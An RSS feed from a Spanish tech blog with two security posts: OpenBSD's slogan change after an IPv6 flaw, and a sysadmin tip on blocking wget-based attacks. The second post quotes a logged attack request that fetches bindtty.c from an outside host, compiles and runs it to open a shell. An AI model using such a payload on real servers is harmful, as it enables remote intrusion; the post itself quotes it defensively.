<?xml version="1.0" encoding="UTF-8"?> <rss version="2.0" xmlns:content="http://purl.org/rss/1.0/modules/content/" xmlns:wfw="http://wellformedweb.org/CommentAPI/" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:sy="http://purl.org/rss/1.0/modules/syndication/" xmlns:slash="http://purl.org/rss/1.0/modules/slash/" ><channel><title>GenteGeek &#187; Seguridad</title> <atom:link href="http://www.gentegeek.com/categorias/seguridad/feed/" rel="self" type="application/rss+xml" /><link>http://www.gentegeek.com</link> <description>Tecnología, curiosidades, gadgets...</description> <lastBuildDate>Mon, 16 May 2011 21:00:16 +0000</lastBuildDate> <language>en</language> <sy:updatePeriod>hourly</sy:updatePeriod> <sy:updateFrequency>1</sy:updateFrequency> <generator>http://wordpress.org/?v=3.2.1</generator> <item><title>OpenBSD: Sólo 2 fallos de seguridad remotos en más de 10 años</title><link>http://www.gentegeek.com/openbsd-cambia-slogan/</link> <comments>http://www.gentegeek.com/openbsd-cambia-slogan/#comments</comments> <pubDate>Thu, 01 Jan 1970 00:00:00 +0000</pubDate> <dc:creator>suil</dc:creator> <category><![CDATA[Seguridad]]></category><guid isPermaLink="false">http://localhost/proyectos/00-laukatu/gentegeek_com/wordpress/?p=191</guid> <description><![CDATA[OpenBSD: Sólo 2 fallos de seguridad remotos en más de 10 años]]></description> <content:encoded><![CDATA[<p><a href="http://es.wikipedia.org/wiki/Openbsd">OpenBSD</a> ha tenido que cambiar recientemente el slogan que lucía orgullosamente hasta ahora, &#8220;Sólo 1 fallo de seguridad remoto en más de 10 años&#8221;.</p><p>Para quien no conozca la historia, <a href="http://www.openbsd.org/index.html">OpenBSD</a> es un sistema operativo libre basado en BSD, es conocido en el mundillo como el sistema operativo más seguro y estable que existe, ya que en la instalación por defecto incorpora todas las medidas de seguridad existentes y los servicios que abre al exterior son muy reducidos. De ahí el slogan anteriormente comentado.</p><p>Pero recientemente se ha descubierto una nueva vulneabilidad en la pila IPv6, con lo que el slogan ha tenido que ser cambiado a &#8220;Sólo 2 fallos de seguridad remotos en más de 10 años&#8221;.</p><p>Ahún así, este SO sigue siendo el más seguro y estable que podemos encontrar actualmente.</p><p>Más información en <a href="http://www.hispasec.com/unaaldia/3070">Hispasec</a></p> ]]></content:encoded> <wfw:commentRss>http://www.gentegeek.com/openbsd-cambia-slogan/feed/</wfw:commentRss> <slash:comments>0</slash:comments> </item> <item><title>Problemas de seguridad relacionados con wget</title><link>http://www.gentegeek.com/seguridad-servidor-web/</link> <comments>http://www.gentegeek.com/seguridad-servidor-web/#comments</comments> <pubDate>Thu, 01 Jan 1970 00:00:00 +0000</pubDate> <dc:creator>suil</dc:creator> <category><![CDATA[GNU/Linux]]></category> <category><![CDATA[Seguridad]]></category><guid isPermaLink="false">http://localhost/proyectos/00-laukatu/gentegeek_com/wordpress/?p=64</guid> <description><![CDATA[Problemas de seguridad relacionados con wget]]></description> <content:encoded><![CDATA[<p>Cualquiera que tenga un servidor web y revise los logs de acceso podrá comprobar el gran número de ataques con scripts kiddies que se producen a lo largo del día. Intentos de ataque como éste son el pan de cada día para los sysadmin:</p><p><i>XXX.XXX.XXX.XXX &#8211; - [10/Jan/2005:23:09:31 -0600] &#8220;GET index.php?template=http://geocities.com/s3xmelayu/bc-x.gif?&#038;cmd=cd%20/tmp;<br /> wget%20http://geocities.com/s3xmelayu/bindtty.c;gcc%20-o%20webphp%20bindtty.c;<br /> chmod%20+777%20webphp;rm%20-rf%20bindtty.c;./webphp HTTP/1.1&#8243; 200 4308 &#8220;-&#8221; &#8220;Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; DigExt)&#8221;</i></p><p>Si usas <a href="http://www.modsecurity.org/">mod_security</a> para <a href="http://www.apache.org/">apache</a> la mayoría de estos ataques se quedan en meros intentos, pero no dejan de ser molestos.</p><p>Mi compañero CrK01, de <a href="http://www.nls.es">NewLight Systems</a>, encontró por fin una solución tan simple como efectiva, basta con renombrar en nuestro sistema el binario &#8220;wget&#8221; a &#8220;baja&#8221; y el 80% de estos ataques fracasarán.</p><p><strong>DISCLAIMER:</strong> Al cambiar el nombre de wget, todos los programas o scripts que hagan uso de éste dejarán de funcionar. No me hago responsable de los posibles fallos que este cambio pueda ocasionar. A mi compañero le funciona sin problemas pero cada sistema es un mundo <img src='http://www.gentegeek.com/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' /></p> ]]></content:encoded> <wfw:commentRss>http://www.gentegeek.com/seguridad-servidor-web/feed/</wfw:commentRss> <slash:comments>0</slash:comments> </item> </channel> </rss>
<!-- Performance optimized by W3 Total Cache. Learn more: http://www.w3-edge.com/wordpress-plugins/

Minified using disk: basic
Page Caching using disk: enhanced

Served from: www.gentegeek.com @ 2012-02-09 01:05:41 -->
